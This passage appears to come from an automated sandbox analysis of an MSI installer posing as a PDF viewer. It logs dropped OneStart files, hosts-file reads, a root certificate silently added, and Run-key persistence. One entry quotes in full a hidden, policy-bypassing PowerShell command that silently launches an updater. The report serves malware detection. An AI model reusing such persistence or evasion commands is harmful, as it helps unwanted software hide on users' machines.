          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process where name = 'msiexec.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process where name = 'msiexec.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process where name = 'msiexec.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BBWC
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI914C.tmp
          Source: classification engineClassification label: mal45.troj.evad.winMSI@53/186@10/21
          Source: C:\Windows\System32\msiexec.exeFile read: C:\Users\user\AppData\Roaming\OneStart\bar\updater.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2328:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_02
          Source: C:\Windows\System32\msiexec.exeFile written: C:\Users\user\AppData\Roaming\OneStart\bar\updater.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PDFViewer_44882564 (1).msiStatic file information: File size 101422592 > 1048576
          Source: PDFViewer_44882564 (1).msiStatic PE information: certificate valid
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI112.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9297.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dllJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dllJump to dropped file

          Boot Survival

          barindex
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBar
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "Start-Sleep 2400";"& 'C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe' /silentall -nofreqcheck"
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Tasks\{016B0CAE-5791-4C21-9ECC-8DF8314A3625}.job
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBar
          Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBar

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
